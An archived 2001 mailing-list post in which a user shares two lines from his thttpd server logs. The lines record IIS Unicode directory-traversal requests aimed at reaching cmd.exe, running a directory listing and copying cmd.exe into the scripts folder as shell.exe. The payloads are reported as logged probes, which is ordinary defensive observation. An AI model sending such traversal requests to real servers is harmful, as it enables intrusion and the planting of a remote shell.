At 03:21 PM 6/26/01 -0400, Jeff Hellige wrote:
>... I work with NT everyday and would just as soon not have
>to....
These are some of the things that I have found in my http server logs:
Apr 7 10:37:34 localhost thttpd[1024]: 207.31.75.150 - - "GET
/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..
%c0%af/winnt/system32/cmd.exe?/c%20dir HTTP/1.0" 404 - "" ""
Jun 20 12:08:43 localhost thttpd[1033]: 216.65.73.2 - - "GET
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+copy+c:\winnt\
system32\cmd.exe+c:\inetpub\scripts\shell.exe HTTP/0.9" 404 - "" ""
The scary part is that there exists some patchlevel of NT where this
works.
carlos.
--------------------------------------------------------------
Carlos E. Murillo-Sanchez carlos_murillo_at_nospammers.ieee.org
Received on Wed Jun 27 2001 - 12:39:12 BST
This archive was generated by hypermail 2.3.0
: Fri Oct 10 2014 - 23:34:00 BST